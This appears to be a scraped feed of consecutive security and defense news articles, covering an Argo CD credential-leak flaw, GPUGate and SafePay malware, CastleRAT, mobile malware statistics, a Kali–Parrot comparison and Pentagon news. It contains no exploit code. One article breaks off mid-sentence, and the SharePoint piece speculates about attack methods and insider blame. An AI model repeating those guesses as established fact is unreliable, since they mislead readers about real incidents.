A critical vulnerability has been discovered in Argo CD that allows API tokens with limited permissions to access sensitive repository credentials.
The flaw in the project details API endpoint exposes usernames and passwords, undermining the platform’s security model by granting access to secrets without explicit permissions.
The vulnerability stems from an improper authorization check in the Project API, specifically the /api/v1/projects/{project}/detailed endpoint.
According to the vulnerability details, API tokens with standard project-level permissions, such as those for managing applications, can retrieve all repository credentials associated with that project.
The expected behavior is that any request for sensitive information, like secrets, would require explicit, elevated permissions. However, the actual behavior allows tokens with basic access to fetch this data.
Exploitation
This issue is not confined to project-specific roles. Any token holding project get permissions is considered vulnerable, including those with broader global permissions like p, role/user, projects, get, *, allow. This widens the potential attack surface significantly, as more general-purpose tokens could be used to exploit the flaw.
Exploitation is straightforward. An attacker in possession of a valid API token with the necessary permissions can make a simple authenticated call to the detailed project API endpoint.
The resulting JSON response will incorrectly include an repositories object containing plaintext username and password credentials for the repositories connected to the project. This allows an attacker to easily harvest credentials that can be used to access private source code repositories.
The consequences of this vulnerability are severe, as exposed credentials could lead to source code theft, malicious code injection into the CI/CD pipeline, and further compromise of development infrastructure.
The Argo CD development team has addressed the issue and released patches. Administrators are strongly advised to upgrade their instances to one of the following secure versions immediately to mitigate the risk:
v3.1.2
v3.0.14
v2.14.16
v2.13.9
Upgrading to a patched version will ensure that the API endpoint properly enforces permission checks and prevents the unauthorized disclosure of repository credentials.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
A sophisticated malware campaign, dubbed “GPUGate,” abuses Google Ads and GitHub’s repository structure to trick users into downloading malicious software.
The Arctic Wolf Cybersecurity Operations Center, the attack chain uses a novel technique to evade security analysis by leveraging a computer’s Graphics Processing Unit (GPU).
The campaign appears to be the work of a Russian-speaking threat actor and is actively targeting IT professionals in Western Europe.
The attack begins with malicious advertising, where attackers place a sponsored ad at the top of Google search results for terms like “GitHub Desktop.” This ad directs users to what appears to be a legitimate GitHub page.
Google search results for GitHub Desktop
In reality, the link leads to a specific, manipulated “commit” page within a repository. This page looks authentic, retaining the repository’s name and metadata, but contains altered download links that point to an attacker-controlled domain.
This “trust bridge” exploits the user’s confidence in both Google and GitHub to deliver the malicious payload.
What makes GPUGate particularly notable is its unique evasion method. The initial installer is a large 128 MB file, designed to bypass security sandboxes that often have file size limits.
weaponized GitHub Desktop
Its most innovative feature is a GPU-gated decryption routine. The malware will only decrypt its malicious payload if it detects a real, physical GPU with a device name longer than ten characters, Arctic Wolf said.
This is a deliberate tactic to thwart analysis, as the virtual machines and sandboxes used by security researchers often have generic, short GPU names or no GPU at all. On such systems, the payload remains encrypted and inert.
The primary goal of this campaign is to gain initial access to organizational networks for malicious activities, including credential theft, data exfiltration, and ransomware deployment.
By targeting developers and IT workers, individuals likely to seek tools like GitHub Desktop, the attackers aim for victims with elevated network privileges.
Once executed, the malware uses a PowerShell script to gain administrative rights, create scheduled tasks for persistence, and add exclusions to Windows Defender to avoid detection. The campaign has been active since at least December 2024 and represents an evolving and significant threat.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
A new set of four malicious packages have been discovered in the npm package registry with capabilities to steal cryptocurrency wallet credentials from Ethereum developers.
“The packages masquerade as legitimate cryptographic utilities and Flashbots MEV infrastructure while secretly exfiltrating private keys and mnemonic seeds to a Telegram bot controlled by the threat actor,” Socket researcher
Penetration testing and ethical hacking have been dominated by specialized Linux distributions designed to provide security professionals with comprehensive toolsets for vulnerability assessment and network analysis.
Among the most prominent options, Kali Linux and Parrot OS have emerged as leading contenders, each offering unique approaches to cybersecurity operations.
This comprehensive analysis reveals that while Kali Linux maintains its position as the industry standard with superior community support and extensive documentation, Parrot OS presents compelling advantages in terms of resource efficiency, user-friendliness, and privacy-focused features that make it increasingly attractive for both beginners and professionals working with limited hardware resources.
Understanding Kali Linux
Kali Linux represents the gold standard in penetration testing distributions, developed by Offensive Security as a Debian-based system specifically engineered for cybersecurity professionals.
The distribution emerged as the successor to BackTrack OS and has maintained its reputation through consistent updates and comprehensive tool integration.
The latest Kali Linux 2025.2 update demonstrates the distribution’s commitment to staying current with emerging threats, incorporating 11 new tools, including goshs, graudit, hekatomb, and netexec, which address modern attack surfaces and cloud security challenges.
The system’s architecture prioritizes functionality over aesthetics, utilizing XFCE as the default desktop environment to maintain resource efficiency while providing a robust platform for security operations.
This design choice reflects Kali’s philosophy of creating a professional-grade environment that prioritizes performance and tool accessibility over visual appeal.
Kali Linux ships with over 600 pre-installed penetration testing tools, carefully curated to cover the complete spectrum of security assessment activities.
The toolset spans multiple categories, including network scanning, vulnerability analysis, exploitation frameworks, digital forensics, and post-exploitation utilities. Notable tools include the Metasploit Framework for exploitation testing, Burp Suite for web application security assessment, Nmap for network discovery, and Wireshark for protocol analysis.
The distribution’s strength lies in its comprehensive coverage of penetration testing methodologies, with tools organized into logical categories that align with industry-standard testing procedures.
The inclusion of cutting-edge tools such as Sqlmc for SQL injection testing, Sprayhound for password spraying integrated with Bloodhound, and Obsidian for documentation purposes demonstrates Kali’s commitment to addressing evolving security challenges.
Kali Linux demands substantial system resources to operate effectively, requiring a minimum of 2 GB RAM with 4 GB recommended for optimal performance. Storage requirements are equally demanding, with 20+ GB needed for a complete installation. The distribution requires modern hardware capabilities, including graphics acceleration for certain operations, making it less suitable for older or resource-constrained systems.
Despite these requirements, Kali Linux has made efforts to optimize performance, including the transition from GNOME to XFCE in 2019 to reduce resource consumption. The system supports various deployment scenarios, from bare metal installations to virtual machine environments, providing flexibility for different operational needs.
Understanding Parrot OS
Parrot OS emerged in 2013 under the leadership of Lorenzo Faletra, positioning itself as a security-focused distribution that balances comprehensive functionality with resource efficiency. Unlike Kali’s singular focus on penetration testing, Parrot OS adopts a broader approach, integrating security tools with privacy protection, digital forensics capabilities, and development environments.
The distribution utilizes the MATE desktop environment as its default interface, providing an intuitive and lightweight experience that remains accessible to users across different skill levels. This design choice reflects Parrot’s commitment to creating a user-friendly environment that doesn’t sacrifice functionality for ease of use.
Parrot OS distinguishes itself through its holistic approach to cybersecurity, offering not only penetration testing tools but also integrated privacy and anonymity features.
The distribution includes over 600 tools covering penetration testing, digital forensics, cryptography, and privacy protection. Key privacy tools include Tor Browser, AnonSurf for traffic anonymization, and Zulu Crypt for encryption operations.
The system’s tool selection mirrors much of Kali’s functionality while adding unique capabilities focused on privacy protection and secure communications. Tools like ExifTool for metadata analysis, Maltego for intelligence gathering, and Volatility for memory forensics provide comprehensive coverage of modern security assessment needs.
One of Parrot OS’s most significant advantages lies in its exceptional resource efficiency. The distribution requires only 320 MB RAM minimum, with 2 GB recommended for optimal operation. Storage requirements are equally modest at 15+ GB, making it suitable for deployment on older or resource-constrained hardware.
This efficiency extends to its overall performance characteristics, with Parrot OS demonstrating superior performance on systems with limited resources while maintaining full functionality.
The distribution’s ability to operate effectively on older hardware makes it particularly attractive for educational environments and organizations with budget constraints.
Kali Linux vs Parrot OS comparison
Direct Performance and Feature Comparison
System Resource Analysis
The most striking difference between these distributions lies in their resource consumption patterns. Kali Linux demands significantly more system resources, requiring 2 GB RAM minimum compared to Parrot OS’s 320 MB minimum. This disparity becomes more pronounced in storage requirements, with Kali needing 20+ GB versus Parrot’s 15+ GB.
Performance testing reveals that Parrot OS consistently outperforms Kali Linux on identical hardware configurations, particularly on systems with limited resources. This efficiency advantage makes Parrot OS particularly suitable for virtual machine deployments where resource allocation is constrained.
Tool Coverage and Specialization
Both distributions offer comprehensive tool coverage with over 600 pre-installed applications, but their focus areas differ significantly. Kali Linux concentrates primarily on penetration testing and security auditing tools, with recent updates adding specialized tools for emerging attack vectors and cloud security. The distribution’s tool selection reflects its professional focus, with each tool carefully vetted for reliability and effectiveness in security assessments.
Parrot OS provides similar penetration testing capabilities while expanding coverage to include privacy tools, cryptographic utilities, and digital forensics applications. The distribution’s unique privacy-focused tools, including AnonSurf and integrated Tor functionality, set it apart from Kali’s more traditional approach.
Community Support and Documentation
Kali Linux benefits from extensive community support backed by Offensive Security’s professional development team. The distribution’s documentation is comprehensive, covering everything from installation procedures to advanced exploitation techniques. The large user base ensures rapid problem resolution and extensive third-party resources.
Parrot OS maintains an active but smaller community focused on collaborative development and user support. While the community is enthusiastic and responsive, the resource base is more limited compared to Kali’s extensive ecosystem. Documentation quality is good but less comprehensive than Kali’s extensive knowledge base.
Security Professionals Usage
Kali Linux maintains its position as the industry standard for professional penetration testing, with many cybersecurity certifications specifically requiring Kali proficiency.
The OSCP (Offensive Security Certified Professional) certification, widely regarded as a premier penetration testing credential, mandates Kali Linux usage throughout the examination process.
Professional security teams consistently choose Kali Linux for formal assessments due to its reputation, comprehensive documentation, and industry acceptance. The distribution’s regular updates and professional backing provide confidence in enterprise environments where reliability is paramount.
Kali Linux presents a steeper learning curve, requiring significant technical expertise to utilize effectively. The distribution’s command-line intensive approach and extensive tool selection can overwhelm beginners, making it more suitable for experienced professionals.
Parrot OS offers a more accessible entry point for cybersecurity education, with its user-friendly interface and intuitive organization making it ideal for students and professionals transitioning into security roles. The distribution’s emphasis on usability doesn’t compromise its professional capabilities, providing a balanced learning environment.
Kali Linux excels in formal penetration testing scenarios, professional security assessments, and environments where industry-standard compliance is required. Its comprehensive tool coverage and regular updates make it ideal for security consultants and enterprise security teams.
Parrot OS demonstrates superior performance in resource-constrained environments, privacy-focused operations, and educational settings. The distribution’s lightweight nature and privacy tools make it particularly suitable for research activities and situations requiring operational security.
The cybersecurity landscape continues evolving with new attack vectors, cloud security challenges, and IoT vulnerabilities requiring specialized tools and approaches. Kali Linux 2025.2 addresses these challenges with new tools specifically designed for modern threat landscapes, including hekatomb for credential extraction and netexec for large network exploitation.
Parrot OS responds to privacy concerns and surveillance issues by strengthening its anonymity features and secure communication tools. The distribution’s focus on privacy protection aligns with growing concerns about digital surveillance and data protection.
Modern cybersecurity operations increasingly rely on virtual environments, cloud deployments, and resource-efficient solutions. Parrot OS positions itself advantageously in this trend through its exceptional resource efficiency and virtual machine optimization.
The distribution’s ability to operate effectively on minimal resources makes it ideal for cloud-based security operations and containerized deployments.
Kali Linux addresses these trends through improved virtualization support and ARM architecture compatibility, though its resource requirements remain higher than those of alternatives.
Recommendations
The choice between Kali Linux and Parrot OS ultimately depends on specific operational requirements, available resources, and user expertise levels.
Kali Linux remains the definitive choice for professional penetration testers, security consultants, and organizations requiring industry-standard compliance. Its comprehensive tool coverage, extensive documentation, and professional backing make it indispensable for formal security assessments and certification preparation.
Parrot OS presents a compelling alternative for educational environments, resource-constrained operations, and privacy-focused activities. Its lightweight architecture, user-friendly interface, and comprehensive privacy tools make it particularly suitable for students, researchers, and professionals working in sensitive environments.
For experienced cybersecurity professionals working in enterprise environments, Kali Linux provides the reliability, tool coverage, and industry acceptance necessary for professional operations. For beginners and privacy-conscious users, Parrot OS offers an accessible entry point with powerful capabilities and resource efficiency.
Organizations with mixed requirements might benefit from deploying both distributions, utilizing Kali for formal assessments and Parrot for research and development activities.
Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.
The future of soldier “super goggles,” designed to give frontline troops an AI-enabled view of the battlefield and voice command over drone swarms, is unlikely to look like the bulky, Star Wars-style face computer that might come to mind. Instead, the new tech may look more like the glasses you could see on patrons in a Brooklyn coffee shop, according to the company chosen to make them.
The Army has awarded a $200 million contract to a startup called Rivet to develop prototype computers, goggles, and watches to give soldiers a battlefield intelligence edge, as part of the Soldier Borne Mission Command program. A joint team from tech giants Anduril and Meta will also design a prototype for consideration under a similar contract, according to people familiar with the matter.
Palmer Luckey, founder of Anduril, hasn’t been shy about his hopes to become the supplier of hands-free augmented reality kits for soldiers and, from there, build out an entire human-machine “ecosystem” to connect operators to drones and AI aides. And as the creator of the Oculus virtual-reality game system, he has something of an advantage. A February blog post featured him with a lab prototype of the Anduril system that looks like something out of science fiction.
But Rivet’s offering looks very different. Dave Marra, Rivet’s founder, told Defense One on Friday that his approach boils down to four words: “comfort, organization, utility, and compliance.”
He sees his company’s prototype as a jumping-off point to connect soldiers with a wide array of AI capabilities through simple voice or other commands, as well as to connect logistics professionals, maintainers, and others with AI-enabled tools.
“These kinds of natural language interactions are the most critical element to enable,” Marra said. “So you think, ‘I have to control robots, and I have to do it without significant training and learning. I want to recognize nouns on the battlefield that could be a target: that could be a good guy, a bad guy, or another noun on the factory floor. I want to identify anomalies, more importantly, correlate in these data sets.’"
[[Related Posts]]
The end result is real-time predictive intelligence delivered directly to the eye—information about how the battlefield is changing and might change, or, in another context, which part might break next and what to do about it. Eyewear that sees probabilities in the future.
The project is part of the Army’s broader pursuit of soldier-borne smart systems, going back more than a decade, before even the Integrated Visual Augmentation System program, which essentially became SBMC. But prototypes from those efforts have faced a number of setbacks.
Now, Rivet has created what it calls an “integrated task system.” It features a small computer soldiers carry, as well as glasses capable of night vision, map display, and a wide array of applications. They look like something you could buy at the mall. That’s part of the point. They were engineered to be useful in conditions where earlier soldier vision displays failed.
“If you’re wearing a pair of glasses on your face, they’ve got to conform to compliance measures for eye protection—not only from a ballistics perspective, but also adversarial lasers. You’re not going to be able to get that at Best Buy,” Marra said.
The system also runs on Android, to better allow operators to configure features to suit their needs. That flexibility reflects the Pentagon’s new approach of pushing more command and purchasing authority down to individual units—the people actually using the equipment who need to adjust it for rapidly changing conditions.
Marra said the company is working directly with soldiers to understand those conditions, beyond scheduled touch points.
“We’ve gone out and tested it at a high frequency with operational units at scale,” he said. “Over the next 18 months, we’re going to do exactly that. In fact, we’ve programmed every 45 or 90 days, we’re going to be out with a minimum of a squad’s worth of systems, a dozen systems, and we’re going to go do soldiering with the soldier. We’re going to hang out with them every minute of that 72-hour mission, or every minute of that training evolution, and take your feedback and put it into the next iterative loop of hardware and software development.”
By contrast, Anduril’s offering is bolstered by the Lattice platform, an AI-powered software system that combines thousands of data streams into a single 3D interface. Lattice—more than the headset—is core to Luckey’s vision of building out the “human-machine ecosystem.”
But Anduril is not alone in that space. Palantir has its own suite of battlefield data-integration products. Marra, who previously worked at Palantir, described that company as a “strategic partner.”
President Donald Trump signed an executive order Friday to rename the Department of Defense as the Department of War.
Just before Trump signed the order in the Oval Office late Friday afternoon, he and Pete Hegseth, the secretary in charge of the department, who stood next to Trump during the signing, said the renaming reflected their intention to return to a more aggressive mindset for the military.
“It's restoring, as you've guided us to, Mr. President, restoring the warrior ethos,” Hegseth said. “The War Department is going to fight decisively, not endless conflicts. It's going to fight to win, not not to lose. We're going to go on offense, not just on defense. Maximum lethality, not tepid legality. Violent effect, not politically correct. We're going to raise up warriors, not just defenders.”
The text of the order calls "Secretary of War" a "secondary" title for Hegseth. "The Secretary of Defense is authorized the use of this additional secondary title — the Secretary of War — and may be recognized by that title in official correspondence, public communications, ceremonial contexts, and non-statutory documents within the executive branch," reads the order.
The Department of War and the Department of the Navy were Cabinet departments from the nation's founding until 1947, when Congress combined them, along with the Department of the Air Force, into a new National Military Establishment. Congress changed that name to the Defense Department two years later.
Trump said Friday that renaming 76 years ago revealed a “political correctness” in the military that contributed to poorer results on the battlefield. The U.S. has not won a major war since the reorganization, he said.
“We could have won every war, but we really chose to be very politically correct or wokey, and we just fight forever and then, we wouldn't lose, really, we just fight to sort of tie,” he said. “We never wanted to win wars that every one of them we would have won easily with just a couple of little changes or a couple of little edicts.”
Because the department’s name came from an act of Congress, it’s unclear if Trump has the power to rename it with an executive order.
The president said Friday he didn’t know if it would be necessary for Congress to be involved, but that he would ask lawmakers to approve the change.
“I don't know, but we're going to find out,” he said when asked if Congress would codify the renaming. “But I'm not sure they have to … There's a question as to whether or not they have to, but we'll put it before Congress.”
Trump added that the cost of replacing signage and other materials associated with the department would be minimal.
The order says: "Within 60 days of the date of this order, the Secretary of War shall submit to the President, through the Assistant to the President for National Security Affairs, a recommendation on the actions required to permanently change the name of the Department of Defense to the Department of War. This recommendation shall include the proposed legislative and executive actions necessary to accomplish this renaming."
Sen. Mitch McConnell of Kentucky, the chair of the Appropriations subcommittee with jurisdiction over the department who has often clashed with Trump, including on defense spending, said on social media that the name change was not meaningful without greater financial investment.
“If we call it the Dept. of War, we'd better equip the military to actually prevent and win wars,” the former Senate Republican leader wrote. “Can't preserve American primacy if we're unwilling to spend substantially more on our military than Carter or Biden. ‘Peace through strength’ requires investment, not just rebranding.”
A recent investigation has revealed that Microsoft employed China-based engineers to maintain and support SharePoint software, the same collaboration platform that was recently compromised by Chinese state-sponsored hackers.
This revelation raises significant concerns about cybersecurity practices and potential insider threats within critical infrastructure systems used by hundreds of government agencies and private companies.
The cybersecurity incident, which Microsoft disclosed last month, involved sophisticated attacks on SharePoint “OnPrem” installations beginning as early as July 7, 2025.
Chinese hackers successfully exploited vulnerabilities in the on-premises version of SharePoint, gaining unauthorized access to computer systems across multiple high-profile targets, including the National Nuclear Security Administration and the Department of Homeland Security.
The attack demonstrated advanced persistent threat capabilities, with hackers maintaining access even after Microsoft’s initial security patch on July 8.
ProPublica analysts identified the concerning operational structure through internal Microsoft work-tracking system screenshots, revealing that China-based engineering teams had been responsible for SharePoint maintenance and bug fixes for several years.
This discovery adds a troubling dimension to the security breach, as the same personnel tasked with maintaining the software’s integrity may have inadvertently created vulnerabilities that adversaries could exploit.
The technical scope of the vulnerability was extensive, with the U.S. Cybersecurity and Infrastructure Security Agency confirming that the exploits enabled attackers to “fully access SharePoint content, including file systems and internal configurations, and execute code over the network.”
The attack vector allowed for remote code execution, effectively granting hackers administrative privileges over compromised systems.
Persistence and Evasion Mechanisms
The SharePoint exploit demonstrated sophisticated persistence tactics that allowed attackers to maintain access even after initial remediation efforts.
When Microsoft released the first security patch on July 8, the threat actors quickly adapted their methods to bypass the new protections, forcing the company to develop additional “more robust protections” in subsequent patches.
The persistence mechanism likely involved embedding malicious code within SharePoint’s configuration files and leveraging the platform’s extensive file system access capabilities.
Attackers could establish backdoors by modifying authentication modules or creating hidden administrative accounts within the SharePoint infrastructure. This approach enabled sustained access to sensitive government and corporate data while remaining undetected by standard security monitoring tools.
Microsoft has acknowledged the security implications and announced plans to relocate China-based support operations to alternative locations.
The company emphasized that all work was conducted under U.S.-based supervision with mandatory security reviews, though experts question whether such oversight measures adequately mitigate the inherent risks of foreign personnel handling sensitive system maintenance.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Cybercriminals unleashed a massive wave of mobile malware attacks during the second quarter of 2025, with security researchers detecting nearly 143,000 malicious installation packages targeting Android and iOS devices.
This surge represents a significant escalation in mobile cyber threats, affecting millions of users worldwide through sophisticated attack vectors designed to steal sensitive data, compromise financial information, and establish persistent backdoors on infected devices.
The malware landscape during Q2 2025 demonstrated remarkable diversity in both attack methodologies and target demographics.
Banking Trojans emerged as the dominant threat category, accounting for 42,220 malicious packages, while mobile ransomware Trojans contributed an additional 695 packages to the threat ecosystem.
The attacks primarily leveraged social engineering tactics, fake application stores, and compromised legitimate applications to infiltrate user devices, with cybercriminals showing increasing sophistication in bypassing modern security mechanisms.
Fake app store page distributing SparkKitty (Source – Securelist)
According to Kaspersky Security Network data, the quarter witnessed 10.71 million blocked attacks involving malware, adware, and unwanted mobile software.
Trojans represented the most prevalent threat type, comprising 31.69% of all detected malicious activities.
Securelist researchers identified several concerning trends, including the emergence of pre-installed malware on certain device models and the evolution of existing threat families to incorporate new evasion techniques.
Among the most notable discoveries was the SparkKitty malware, a sophisticated threat targeting both Android and iOS platforms with image-stealing capabilities.
This malicious application specifically targeted cryptocurrency wallet recovery codes stored as screenshots in device galleries, representing a direct threat to digital asset security.
The malware operated by masquerading as legitimate applications while secretly exfiltrating sensitive visual data to remote servers controlled by cybercriminals.
Advanced Persistence and Evasion Mechanisms
The technical sophistication of Q2 2025 mobile malware reached unprecedented levels, particularly in persistence and detection evasion strategies.
The Trojan-Spy.AndroidOS.OtpSteal.a exemplified this evolution by disguising itself as a Virtual Private Network client while implementing the Notification Listener service to intercept one-time password codes from messaging applications and social networks.
This approach allowed attackers to bypass two-factor authentication mechanisms by automatically forwarding intercepted codes to Telegram channels via automated bots.
The malware’s persistence mechanisms involved deep system integration, with samples like Trojan-DDoS.AndroidOS.Agent.a embedding malicious Software Development Kits directly into adult content viewing applications.
This integration technique enabled the creation of distributed denial-of-service botnets from compromised mobile devices, demonstrating how cybercriminals are adapting traditional attack methodologies for mobile platforms.
The embedded SDK allowed for dynamic configuration of attack parameters, including target addresses and transmission frequencies, providing attackers with flexible command and control capabilities.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
A new ransomware threat has emerged as one of 2025’s most prolific cybercriminal operations, with SafePay ransomware claiming attacks against 73 victim organizations in June alone, followed by 42 additional victims in July.
This surge has positioned SafePay as a significant threat actor that security teams worldwide must understand and prepare to defend against.
Unlike traditional ransomware-as-a-service (RaaS) models that rely on affiliate networks, SafePay operates as a closed, independent group that maintains strict operational security.
The group’s rapid-fire attack methodology has proven remarkably effective, with more than 270 claimed victims documented throughout 2025.
Their operations target primarily mid-size and enterprise organizations across the United States, Germany, Great Britain, and Canada, focusing on industries critical to daily operations including manufacturing, healthcare, and construction.
Most affected industries (Source – Bitdefender)
The group’s emergence can be traced back to September 2024, arising in the aftermath of significant law enforcement operations that dismantled ALPHV (Black Cat) and severely disrupted LockBit’s infrastructure through Operation Cronos.
Bitdefender analysts identified parts of the SafePay ransomware that complement functionalities associated with LockBit, specifically LockBit Black, though the groups operate with distinctly different methodologies and encryption processes.
SafePay demonstrates an alarming capability to execute complete attack chains within 24-hour periods, moving from initial access through encryption with devastating efficiency.
SafePay’s Victims Claimed Per Day (Source – Bitdefender)
Their victim selection appears methodical, targeting organizations with revenues typically around $5 million, though outliers include entities with revenues exceeding $100 million and one victim surpassing $40 billion in revenue.
Encryption and Evasion Mechanisms
SafePay employs sophisticated technical approaches that distinguish it from other ransomware families.
The malware utilizes the ChaCha20 encryption algorithm, implementing unique symmetric keys for each encrypted file while embedding additional keys directly within the ransomware executable.
This dual-key approach complicates recovery efforts and ensures that each victim’s encryption remains uniquely secured.
The ransomware demonstrates advanced defense evasion capabilities, including debugger detection avoidance and the ability to terminate processes associated with anti-malware functions.
Upon execution, SafePay immediately begins removing volume shadow copies to prevent system restoration, then proceeds to encrypt files with the .safepay extension while deploying ransom notes named “readme_safepay.txt” in affected directories.
One notable technical characteristic involves the malware’s geographic targeting logic.
SafePay performs language keyboard detection to identify systems using Cyrillic keyboards, preventing execution on these systems, suggesting potential Russian connections or alliances within the threat actor ecosystem.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
A sophisticated new threat actor designated TAG-150 has emerged as a significant cybersecurity concern, demonstrating rapid development capabilities and technical sophistication in deploying multiple self-developed malware families since March 2025.
The group has successfully created and deployed CastleLoader, CastleBot, and their latest creation, CastleRAT, a previously undocumented remote access trojan that represents a concerning evolution in their operational capabilities.
The threat actor primarily initiates infections through Cloudflare-themed “ClickFix” phishing attacks and fraudulent GitHub repositories masquerading as legitimate applications.
Victims are deceived into copying and executing malicious PowerShell commands on their own devices, creating a seemingly user-initiated compromise that bypasses traditional security measures.
Despite limited overall engagement, the campaign achieved a remarkable 28.7% infection rate among victims who interacted with malicious links, demonstrating the effectiveness of their social engineering tactics.
Recorded Future analysts identified an extensive multi-tiered infrastructure supporting TAG-150’s operations, revealing a sophisticated command-and-control architecture spanning four distinct tiers.
The infrastructure includes victim-facing Tier 1 servers hosting various malware families, intermediate Tier 2 servers accessed via RDP, and higher-level Tier 3 and Tier 4 infrastructure used for operational management and backup purposes.
This complex network design suggests advanced operational security awareness and redundancy planning.
The malware ecosystem deployed by TAG-150 serves as an initial infection vector for delivering secondary payloads including SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, and numerous information stealers such as Stealc, RedLine Stealer, and Rhadamanthys Stealer.
Multi-tiered infrastructure linked to TAG-150 (Source – Recordedfuture)
This diverse payload delivery capability indicates either a Malware-as-a-Service operation or strategic partnerships with other cybercriminal groups.
Advanced Persistence and Evasion Mechanisms
CastleRAT represents the most technically advanced component of TAG-150’s arsenal, available in both Python and C variants with distinct capabilities.
The malware employs a custom binary protocol utilizing RC4 encryption with hard-coded 16-byte keys for secure communications.
Both variants query the geolocation API ip-api.com to obtain location information through the infected host’s public IP address, enabling geographic targeting and operational intelligence gathering.
The C variant demonstrates significantly enhanced functionality, incorporating keylogging capabilities, screen capturing, clipboard monitoring, and sophisticated process injection techniques.
Recent developments include the implementation of C2 deaddrops hosted on Steam Community pages, representing an innovative approach to command-and-control communications that leverages legitimate gaming platforms to evade detection.
The malware maintains persistence through registry modifications and employs browser process masquerading for execution, while the Python variant includes self-deletion capabilities using PowerShell commands.
These evasion techniques, combined with the group’s use of anti-detection services like Kleenscan, demonstrate TAG-150’s commitment to operational longevity and stealth.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
.webp)
.webp)
.webp)
.webp)